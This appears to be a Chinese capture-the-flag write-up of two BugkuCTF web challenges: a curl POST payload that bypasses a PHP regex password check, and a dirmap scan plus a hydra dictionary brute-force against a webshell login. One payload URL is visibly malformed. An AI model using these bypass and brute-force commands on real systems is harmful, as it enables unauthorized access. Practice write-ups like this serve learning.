updated:
BugkuCTF-Web(3)
一.题目如下(月度最沙雕题目)

注意题中的正则表达式涉及到POISX Bracket Expressions
法一:
可以看到,出题人忘了执行isset判断password是否为null,因此本题最简单的payload如下
curl -X POST http://123.206.87.240:9009/21.php这样可以直接解决。让password为任意一个不多于12个字符的字符串也可以解决问题。
下面我们试试正常的方法。
法二:
直接根据正则表达式构造(来自于大佬的wp)
payload:
curl -X POST -d "password=42.000000000000e-0" http:/7.240:9009/21.php然而迷惑的事情来了,这样输出的结果就是$flag

迷惑至极=-=,只好按第一种方法了。
二.题目如下
http://123.206.87.240:8002/webshell/先扫一下网站后台
dirmap -i http://123.206.87.240:8002/webshell/shell.php -lcf发现webshell的位置

发现登陆界面,抓包发现网页使用post方法提交数据,使用hydra工具进行弱口令爆破
hydra -l %00 -P webshellpasswords.dict -s 8002 123.206.87.240 http-post-form "/webshell/shell.php:user=^USER^&pass=^PASS^:*不是自己的马不要乱骑!*"
拿到密码是hack,登陆即可得到flag。